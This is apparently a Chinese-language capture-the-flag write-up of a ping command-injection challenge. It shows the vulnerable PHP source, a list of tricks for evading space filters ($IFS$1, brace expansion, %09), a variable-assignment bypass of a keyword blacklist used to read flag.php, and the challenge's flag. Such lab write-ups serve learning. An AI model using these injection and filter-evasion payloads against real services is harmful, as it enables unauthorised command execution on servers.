咱就是说,这道题真的又学到了很多东西,那就慢慢的写吧。
要给一个ip地址,就正常思路走
?ip=127.0.0.1;ls
直接就有flag的文件存在,看看能不能访问
看这个应该是空格被过滤了,空格绕过的方法有很多
$IFS
${IFS}
$IFS$1 //1可以改成其他的数字或者字母
<
<>
{cat,flag.php} //用逗号实现了空格功能
%20
%09
我最开始尝试了%09,但是没有办法绕过,最后只有$IFS$1能够成功的构造命令,而且过滤太多了,我尝试查找源码。最开始的时候还有一个index.php文件,我们打开看看
真正源码:
/?ip=
<pre>PING 127.0.0.1 (127.0.0.1): 56 data bytes
/?ip=
<?php
if(isset($_GET['ip'])){
$ip = $_GET['ip'];
if(preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{1f}]|\>|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match)){
echo preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{20}]|\>|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match);
die("fxck your symbol!");
} else if(preg_match("/ /", $ip)){
die("fxck your space!");
} else if(preg_match("/bash/", $ip)){
die("fxck your bash!");
} else if(preg_match("/.*f.*l.*a.*g.*/", $ip)){
die("fxck your flag!");
}
$a = shell_exec("ping -c 4 ".$ip);
echo "<pre>";
print_r($a);
}
?>
好像有点东西,那我们打开源码看看 过滤了那么多,甚至*都给你整了,好哇好哇,那就说一个全新的绕过方式,赋值绕过(我取的名字?)
?ip=127.0.0.1;a=ag;cat$IFS$1fl$a.php
什么都没有,习惯性的打开源码
这不就出来了!
flag{b2d86d89-9a3b-457a-83ee-e783d0bc415b}